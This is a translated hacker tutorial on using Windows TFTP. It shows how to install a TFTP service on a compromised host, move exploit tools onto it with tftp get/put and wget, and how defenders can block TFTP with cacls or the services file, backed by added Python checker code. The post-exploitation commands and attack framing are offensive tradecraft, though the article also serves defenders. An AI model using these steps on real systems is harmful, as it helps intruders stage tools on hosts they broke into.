TFTP Installation and Use: A Complete Guide
Rookie A has obtained a shell through a WebDAV vulnerability. He adds an administrator account, but then finds that he cannot establish an IPC$ connection to the host, and under the cmd shell he only gets a startup error. So how does he upload files? He has heard that people use FTP, but ftp.exe needs an interactive session, which the cmd shell does not provide, so the shell just hangs after he enters the ftp command. The rookie is stumped. Someone tells him to write an FTP script file with the echo command and run it with ftp -s:file; this does work in practice, but the rookie finds it cumbersome. What to do?
At this moment a voice sounds in his ear: use TFTP, and be happy. TFTP?!@#$^&*... The rookie thinks for a while and still cannot figure it out. He has heard of FTP, but what is TFTP? So today I will explain to the rookie how to install and use it, what role it plays in an intrusion, and my own experience with it.
I. Introduction to TFTP:
TFTP is short for Trivial File Transfer Protocol, a protocol in the TCP/IP suite for simple file transfer between a client and a server. Its functionality is limited, but it still plays a big role in our intrusions.
TFTP differs from the FTP server built into Win2K and from the currently popular Serv-U in that TFTP is carried over UDP, and the TFTP program is tiny compared to FTP. Its defects are that the data transfer it provides is not reliable, that it offers no access authorization or authentication mechanism, and that it relies on timeout and retransmission to ensure that data arrives; it uses UDP port 69. However, precisely because it is a UDP port, it easily escapes firewall restrictions and the port auditing of IP security policies, so it can be used flexibly during an intrusion. That is why I am introducing it to you.
II. Enabling the TFTP service:
Perhaps you still remember the classic Unicode vulnerability: using it, you could execute commands from the browser, upload IDQ.dll via TFTP, and then combine it with ISPC.exe to obtain administrator privileges. But, as you know, a TFTP server is not easy to find. Then again, since tftp.exe is a rather cute little gadget from Microsoft, we can use it to do something: open the TFTP service on the broiler (the compromised host) itself, so that we no longer need to find a TFTP server. Under Win2K, TFTP.exe can be found in WINNT\System32, and another copy in WINNT\System32\DLLCache. You can also type dir %windir%\tftp* /s on the command line (this lists every program whose name starts with tftp under the %windir% tree). My machine reports the following:
Volume in drive C has no label. Volume Serial Number is 287C-D610
Directory of C:\winnt\system32
2002-07-22 12:05 17,680 TFTP.exe
1 File(s) 17,680 bytes
Directory of C:\winnt\system32\dllcache
2002-07-22 12:05 17,680 TFTP.exe
2001-08-22 08:00 19,728 TFTPD.EXE
2 File(s) 37,408 bytes
As you can see, there is also a TFTPD.exe program; that's right, it is the server-side program of the TFTP service. So how do we start the TFTP service on the broiler? Double-click to run it? Install it? Here we need a tool from the Resource Kit to install TFTPD as a service: INSTSRV is the command-line tool, and srvinstw.exe is its GUI version (see Figure 1). Let's look at it:
C:\longker>INSTSRV.EXE
Installs and Removes System Services from NT
Instsrv
Install Service Example:
INSTSRV MyService C:\Mydir\diskService.exe
-Or-
INSTSRV MyService C:\mailsrv\mailsrv.exe -a mydomain\joebob -p foo
Remove Service Example:
INSTSRV MyService REMOVE
Now let's install TFTPD as a service:
C:\longker>instsrv "TFTP SERVICES" C:\WINNT\System32\dllcache\tftpd.exe
The service was successfully added!
Make sure that you go into the Control Panel and use
the Services applet to change the Account Name and
Password that this newly installed service will use
for its Security Context.
This installs the TFTP service under the service name TFTP Services. Let's start it:
C:\longker>net start "TFTP SERVICES"
The TFTP Services service is starting.
The TFTP Services service was started successfully.
OK, the service has started successfully. We can use fport to see which port it has opened:
1524 TFTPD -> 69 udp c:\winnt\system32\dllcache\tftpd.exe
As you can see, it transfers files over UDP, and the open port is 69.
Or we can query with the following command:
C:\longker>netstat -an | find "69"
UDP 202.xx.xx.165:69 *:*
Once the service is running, a TFTPDROOT folder is created under the system directory; the files we upload, and the files we offer for download, are placed there.
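The netstat check above uses find "69", which matches any line containing those two digits (ports 169, 1690 and so on). As an added example that is not part of the original article, here is a small parser over constructed Win2K-style netstat -an output that reports only sockets bound to exactly UDP port 69, beside the article's naive substring check for comparison.

```python
"""Added example: exact-match detection of a UDP/69 listener in netstat -an output.
The sample output below is constructed for this example (IPv4 layout of Win2K netstat)."""
import re

# Constructed sample: one real TFTP listener plus lines that merely contain "69".
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    202.xx.xx.165:1690     10.0.0.5:80            ESTABLISHED
  UDP    202.xx.xx.165:69       *:*
  UDP    0.0.0.0:169            *:*
  UDP    0.0.0.0:4569           *:*
"""

# proto, local address:port, foreign address, optional state
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<addr>\S+):(?P<port>\d+)\s+(?P<foreign>\S+)"
    r"(?:\s+(?P<state>\S+))?\s*$"
)


def parse_netstat(text):
    """Return (proto, local_addr, local_port, state) for every socket line; headers are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append((m["proto"], m["addr"], int(m["port"]), m["state"] or ""))
    return rows


def udp_listeners_on(text, port):
    """Local addresses bound to the given UDP port, exact port match only."""
    return [addr for proto, addr, p, _ in parse_netstat(text) if proto == "UDP" and p == port]


def naive_find(text, needle="69"):
    """The article's check, netstat -an | find "69": a substring match on each line."""
    return [line.strip() for line in text.splitlines() if needle in line]
```

On the constructed sample the naive check returns four lines while the exact check returns only the one 202.xx.xx.165 socket.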
Here I also recommend a very good TFTP server to everyone: it has logging and directory-setting functions and shows the transfer progress. Most importantly, it is free and runs on multiple platforms.
Download address: http://5ihack.vicp.net:88/down/show.asp?id=219
III. How to use TFTP:
The built-in help of tftp.exe:
TFTP [-i] host [GET | PUT] source [destination]
-i           Specifies binary image transfer mode (also called octet). In binary image mode the file is moved
             literally, byte by byte. Use this mode ...
host         Specifies the local or remote host.
GET          Transfers the file destination on the remote host to
             the file source on the local host.
PUT          Transfers the file source on the local host to
             the file destination on the remote host.
source       Specifies the file to transfer.
destination  Specifies where to transfer the file.
Description:
The -i option transfers files in binary mode; much exploit code must be transferred in this mode.
host is the host running the TFTP service; it can be the local host or a remote one.
GET downloads the file into the current working directory, and PUT uploads it to the machine running the TFTP service. source is the name of the file you want to upload or download.
Let's look at a few examples:
C:\longker>tftp -i 202.xx.xx.165 get sc.exe
Transfer successful: 63248 bytes in 1 second, 63248 bytes/s
This downloads sc.exe from the host running the TFTP service; the speed is good :)
C:\longker>tftp -i 202.xx.xx.165 put sc.exe
Transfer successful: 63248 bytes in 1 second, 63248 bytes/s
This uploads sc.exe to the TFTP server.
IV. Related questions:
Since TFTP comes with the system, we can use it to upload the tools we need without first downloading any other tool. So for the rookie's problem above, we can download the tools we need with TFTP, or use TFTP to download wget.exe (a small tool that fetches programs from a web server) and then use wget to download a toolkit we have prepared in advance.
The earlier problem is solved, but the rookie will run into others. For example, when he wants to delete an uploaded file he gets the error: Access is denied! What happened? "I can't even delete a file I uploaded myself; that's absurd." The reason is that files uploaded through TFTP are read-only by default, so we need to run attrib -r to clear the read-only attribute before deleting them.
Everyone knows that many Internet worms and hacker attacks try to gain the right to run code through a vulnerability, and worms often use the TFTP client that comes with Windows to fetch the programs they need, such as backdoors or tools like NC. Newer ones, such as the popular ASP Trojan, can also use cmd.asp to call TFTP to download tools and then obtain system administrator privileges. Security-minded readers may ask: if my machine also gets compromised, how do I stop the intruder from using TFTP? I introduce two methods here.
1: Use CACLS to restrict which users may run the program.
C:\>cacls
Displays or modifies access control lists (ACLs) of files
CACLS filename [/T] [/E] [/C] [/G user:perm] [/R user [...]]
               [/P user:perm [...]] [/D user [...]]
   filename      Displays ACLs.
   /T            Changes ACLs of specified files in the current directory and all subdirectories.
   /E            Edit ACL instead of replacing it.
   /C            Continue on access denied errors.
   /G user:perm  Grant specified user access rights.
                 Perm can be: R Read  W Write  C Change (write)  F Full control
   /R user       Revoke specified user's access rights (only valid with /E).
   /P user:perm  Replace specified user's access rights.
                 Perm can be: N None  R Read  W Write  C Change (write)  F Full control
   /D user       Deny specified user access.
Wildcards can be used to specify more than one file in a command. You can specify more than one user in a command.
With the help above in hand, we can deny the IUSR_ComputerName user permission to run TFTP.exe. (Note that without /E, cacls replaces the file's whole ACL with the new entry instead of editing it, which is why it asks for confirmation.)
C:\>cacls C:\WINNT\System32\tftp.exe /D IUSR_ComputerName
C:\>cacls C:\WINNT\System32\dllcache\tftp.exe /D IUSR_ComputerName
Are you sure (Y/N)?Y
processed file: c:\winnt\system32\tftp.exe
processed file: c:\winnt\system32\dllcache\tftp.exe
C:\>tftp
Access is denied.
Clearly we have achieved our goal. In the same way, we can forbid the IUSR account from calling cmd.exe.
2: Can't we just delete TFTP.exe and be done with it once and for all? No, because system programs such as TFTP.exe are protected by Windows File Protection under Win2K and cannot be altered. So here is another method:
open the services file in %systemroot%\system32\drivers\etc with a text editor and find the line for tftp:
bootps   67/udp   dhcps   #Bootstrap Protocol Server
bootpc   68/udp   dhcpc   #Bootstrap Protocol Client
tftp     69/udp           #Trivial File Transfer
Change 69/udp to 0/udp, save and exit. Now let's see whether TFTP can still be used:
it reports "Timeout occurred", which also achieves our purpose.
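As an added example that is not part of the original article, the following Python code carries out the second method from above programmatically: it parses a Windows-style services file, rewrites only the tftp/udp entry to port 0 while leaving every other line byte-for-byte intact, and offers a check that reports whether a given file is already in that state. The services text embedded below is a constructed sample modelled on the three lines quoted above; on a real host you would read %SystemRoot%\system32\drivers\etc\services instead.

```python
"""Added example: neutralize the tftp entry in a services file and verify the result.
Format assumed (the standard one): <name>  <port>/<proto>  [aliases ...]  [# comment]"""
import re

# Constructed sample modelled on the lines quoted in the article.
SAMPLE_SERVICES = """\
# constructed sample of %SystemRoot%\\system32\\drivers\\etc\\services
bootps             67/udp    dhcps    #Bootstrap Protocol Server
bootpc             68/udp    dhcpc    #Bootstrap Protocol Client
tftp               69/udp             #Trivial File Transfer
gopher             70/tcp
"""

# name, whitespace gap, port/proto, then aliases and comment verbatim
ENTRY_RE = re.compile(r"^(?P<name>\S+)(?P<gap>\s+)(?P<port>\d+)/(?P<proto>[A-Za-z]+)(?P<rest>.*)$")


def parse_services(text):
    """Return {(name, proto): port} for each entry; comment-only and blank lines are ignored."""
    table = {}
    for line in text.splitlines():
        body = line.split("#", 1)[0].rstrip()
        m = ENTRY_RE.match(body)
        if m:
            table[(m["name"].lower(), m["proto"].lower())] = int(m["port"])
    return table


def neutralize_service(text, name="tftp", proto="udp", new_port=0):
    """Rewrite the port of the named entry to new_port; all other lines are kept unchanged.
    Returns (new_text, number_of_lines_changed)."""
    out, changed = [], 0
    for line in text.splitlines(keepends=True):
        stripped = line.rstrip("\r\n")
        m = ENTRY_RE.match(stripped)
        if m and m["name"].lower() == name and m["proto"].lower() == proto:
            eol = line[len(stripped):]  # preserve the original line ending
            line = f"{m['name']}{m['gap']}{new_port}/{m['proto']}{m['rest']}{eol}"
            changed += 1
        out.append(line)
    return "".join(out), changed


def tftp_is_neutralized(text):
    """True when the file maps tftp/udp to port 0, the state the article aims for."""
    return parse_services(text).get(("tftp", "udp")) == 0
```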